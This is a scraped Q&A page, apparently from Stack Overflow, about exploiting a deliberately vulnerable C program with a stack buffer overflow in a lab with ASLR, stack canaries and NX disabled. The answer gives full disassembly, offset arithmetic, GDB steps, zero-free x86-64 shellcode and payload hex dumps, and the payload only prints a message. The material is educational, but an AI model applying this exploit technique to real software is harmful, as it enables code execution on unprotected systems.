I am studying the stack-base buffer overflow vulnerability. I would like to inject the following shellcode I wrote:
BITS 64
jmp short one
two:
pop rcx
xor rax,rax
mov al, 4
xor rbx, rbx
inc rbx
xor rdx, rdx
mov dl, 15
int 0x80
mov al, 1
dec rbx
int 0x80
one:
call two
db "Hello, Friend.\n", 0x0a
I disabled ASLR ( echo 0 > /proc/sys/kernel/randomize_va_space
) and compiled the program using -fno-stack-protector -z execstack
, but still when I run the command:
root@computer# ./simple $(python3 -c 'print("A" * 64 + "\x6b\xe7\xff\xff\xff\x7f")')
this is what I get:
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkçÿÿÿ
Segmentation fault
The offset (64) is calculated in gdb (the distance between the variable buffer and rbp). The address in the command is the little-endian of 0x7fffffffe76b
, the env-var in which the shellcode is in. I also hexdumped the injected program, making sure no null bytes were present:
00000000 eb 1a 59 48 31 c0 b0 04 48 31 db 48 ff c3 48 31 |..YH1...H1.H..H1|
00000010 d2 b2 0f cd 80 b0 01 48 ff cb cd 80 e8 e1 ff ff |.......H........|
00000020 ff 48 65 6c 6c 6f 2c 20 46 72 69 65 6e 64 2e 5c |.Hello, Friend.\|
00000030 6e 0a |n.|
00000032
The address was calculated using:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
int pl = strlen(*argv);
char *addr = getenv(*++argv);
addr += (pl - strlen(*++argv))*2;
printf("\n%s @ %p\n\n", *--argv, addr);
}
A changed version of the program in Jon Erickson's book.
This is the program with the vulnerability:
//simple.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void hidden(void){
printf("Welcome to the dark side, young padawan");
exit(0);
}
void welcome(char *s){
char buffer[50];
//int placeholder = 13;
strcpy(buffer, "Welcome ");
strcat(buffer, s);
printf("%s\n", buffer);
}
int main(int argc, char **argv){
if(--argc < 1){
printf("\nUsage: %s [NAME]\n\n", *argv);
exit(1);
}
welcome(*++argv);
}
Lastly, I dug in using GDB, and I found a strange thing, which I don't know how to avoid (or fix):
(gdb) p $rbp - $rsp
$1 = 80
(gdb) x/48x $rsp-80
0x7fffffffdd90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdda0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddc0: 0x00000000 0x00000000 0xf7ffe180 0x00007fff
0x7fffffffddd0: 0x00000002 0x00000000 0x555551bf 0x00005555
0x7fffffffdde0: 0x00000000 0x00000000 0xffffe2cf 0x00007fff
0x7fffffffddf0: 0x636c6557 0x20656d6f 0x41414141 0x41414141
0x7fffffffde00: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde10: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde20: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde30: 0x41414141 0x41414141 0xafc394c2 0xc335b8c3
0x7fffffffde40: 0xff007fbc 0x00007fff 0x00000000 0x00000001
(gdb) c
Continuing.
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAïø5ü
Program received signal SIGSEGV, Segmentation fault.
0x00005555555551cd in welcome (s=0x7fffffffe2cf 'A' <repeats 64 times>, "\302\224ïø5ü\177") at simple.c:16
16 }
After the padding ( 0x41
), the return address is ruined due to the double byte representation of \xff
.
Can someone help me understand why I am not able to inject the shellcode?
First of all, use 64-bit code when exploiting a 64-bit executable. int 0x80
is the old 32-bit syscall interface .
Second, you can pass the shellcode in the buffer itself, making it act as both the shellcode and padding. See below if you still want to use an environment variable.
I won't disable ASRL globally and instead rely on GDB setting the appropriate personality of the debugged process to individually disable ASRL.
Since the process read the string from the command line, this gets tricky (but not much) because the command line arguments will shift the stack pointer down (the bigger they are the lower the stack pointer will be) at the program entry-point (Linux saves environments variables and command line arguments above the stack).
This will change the actual address where the shellcode will be loaded.
So you first need to know how big the shellcode will be and for that you need to also know how much data is needed to overwrite the return address, you can do this by inspecting the disassembly of welcome
.
For a function as simple as it is, objdump
will suffice:
000000000000118b <welcome>:
118b: 55 push %rbp
118c: 48 89 e5 mov %rsp,%rbp
118f: 48 83 ec 50 sub $0x50,%rsp
1193: 48 89 7d b8 mov %rdi,-0x48(%rbp) ;message
1197: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
119b: 48 b9 57 65 6c 63 6f movabs $0x20656d6f636c6557,%rcx "Welcome "
11a2: 6d 65 20
11a5: 48 89 08 mov %rcx,(%rax)
11a8: c6 40 08 00 movb $0x0,0x8(%rax)
11ac: 48 8b 55 b8 mov -0x48(%rbp),%rdx ;message
11b0: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
11b4: 48 89 d6 mov %rdx,%rsi
11b7: 48 89 c7 mov %rax,%rdi
11ba: e8 91 fe ff ff call 1050 <strcat@plt> ;<--
11bf: 48 8d 45 c0 lea -0x40(%rbp),%rax
11c3: 48 89 c7 mov %rax,%rdi
11c6: e8 65 fe ff ff call 1030 <puts@plt>
11cb: 90 nop
11cc: c9 leave
11cd: c3 ret
You can see from my comment that the string buffer
is at rbp-0x40
.
So we need 64 bytes to reach the frame pointer plus 8 bytes to reach the return address plus 8 bytes of the return address itself.
But we start after the string "Welcome "
, since this is a strcat
, so the total shellcode size is 64 + 8 + 8 - 8 = 72 bytes.
Create a file with 72 bytes:
> python -c 'print("A"*72, end="")' > shellcode
Now use this file and GDB to find out the address of buffer
:
> gdb ./simple -ex 'b welcome' -ex 'r $(cat shellcode)' -ex 'p &buffer'
...
Breakpoint 1, welcome (s=0x7fffffffe78f 'A' <repeats 72 times>) at simple.c:13
13 strcpy(buffer, "Welcome ");
$1 = (char (*)[50]) 0x7fffffffe2d0
0x7fffffffe2d0
is the address of buffer
we now know:
buffer
: 0x7fffffffe2d8
It's time to write a shellcode and test it. Since we are passing it in the command line it must also not contain new lines. However printing a new line is useful to flush the current line to stdout, so I used an ugly hack to make a new line at the end of the string at runtime.
The ugly shellcode code is:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
mov BYTE [rsi+message.len-1], 0xaa ;Make the new line replacing the last char of the string
xor BYTE [rsi+message.len-1], 0xa0 ;Turn 0xaa into 0x0a
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!A" ;Last char is replaced with a new line
.len EQU $-message
Now assemble this:
> nasm shellcode.asm -o shellcode
and add any padding to make the file 64 bytes in size and then add the return address found above:
0000:0000 | 6A 01 58 6A 01 5F 48 8D 35 1C 01 01 01 48 81 EE | j.Xj._H.5....H.î
0000:0010 | 01 01 01 01 C6 46 06 AA 80 76 06 A0 6A 07 5A 0F | ....ÆF.ª.v. j.Z.
0000:0020 | 05 6A 3C 58 31 FF 0F 05 48 65 6C 6C 6F 21 41 41 | .j<X1ÿ..Hello!AA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | D8 E2 FF FF FF 7F 00 00 | Øâÿÿÿ...
The stack is aligned on 16 bytes so as long as your shellcode length is between 0x40 and 0x4f (ends included) the shellcode address won't change.
Finally, run the shellcode:
> gdb ./simple -ex 'r $(cat shellcode)'
...
Welcome jXj_H�5H���F��v�jZj<X1�Hello!AAAAAAAAAAAAAAAAAA�����
Hello!
[Inferior 1 (process 168571) exited normally]
I assume you read the section above.
The address of the envar depends both on its size and the size of the command line argument. The command line argument must be at least 64 + 6 bytes long (6 because the last two bytes of the return addresses are zero, so 6 suffices), and the shellcode can be any size. For the sake of simplicity, we can make both files 70 bytes long.
To be more precise: the address of the envar is sensitive to the size of the shellcode to the byte granularity but it's sensitive to the size of the command line argument only on 16B steps (once this quantity was called a paragraph ) because the stack is aligned on this size.
Write a 70-bytes file with a recognizable pattern, like:
0000:0000 | 43 41 4E 41 52 59 41 41 41 41 41 41 41 41 41 41 | CANARYAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
Call it pattern
. This will simulate the shellcode and we now need it to have a few distinct bytes we can search for.
Create another 70-bytes file with another pattern:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
call it placeholder
. This will simulate the command line argument.
Find where the envar is with gdb. Remember that we need to pass 70 bytes as the command line argument to simulate the condition under which the program will be run.
The file placeholder
will be used for this purpose and the file pattern
will be used for searching its first bytes in memory.
> SC=$(cat pattern) gdb ./simple -ex 'b main' -ex 'r $(cat placeholder)' -ex 'find /b1 $rsp, +3000, 0x43, 0x41, 0x4e, 0x41' -ex 'p $_'
...
Breakpoint 1, main (argc=2, argv=0x7fffffffe3f8) at simple.c:19
19 if(--argc < 1){
0x7fffffffec1f
1 pattern found.
$1 = (void *) 0x7fffffffec1f
Now edit placeholder and put the address found in its last 6 bytes:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 1F EC FF FF FF 7F | .ìÿÿÿ.
This is the final value of the command line argument.
Finally, make the shellcode. It's pretty much the same but now we can use bytes of value 0x0a and I padded it to 70 bytes:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!", 0x0a ;Last char is replaced with a new line
.len EQU $-message
TIMES 70 -($-$$) db 'A'
Assemble it:
> nasm shellcode.asm -o shellcode
We can now run it:
> SC=$(cat shellcode) gdb ./simple -ex 'r $(cat placeholder)'
...
Welcome CANARYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Hello!
[Inferior 1 (process 170902) exited normally]
Out strategy has been that of using GDB to replicate the program runtime conditions when it will be exploited.
In the first section we are interested in finding the address of buffer
, we realized that this depends on the size of the command line arguments so we first found out the shellcode size by statically analyzing the program and then we found the address of buffer
using a fake shellcode.
The exploitation itself is pretty basic, the stack is executable and the return address is simply overwritten to steer the execution.
In the second section, we are interested in finding the address of an envar value that the kernel places above the stack.
We proceed in the same manner, we use a fake command line argument, a fake shellcode with a recognizable pattern and GDB to find the address of the envar value.
This time we must be more careful about the exact size, at least for the shellcode itself.
The exploitation is similar to the previous one but the shellcode is inside an envar (which allows for newlines and whatnot). What are interested in finding the address
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.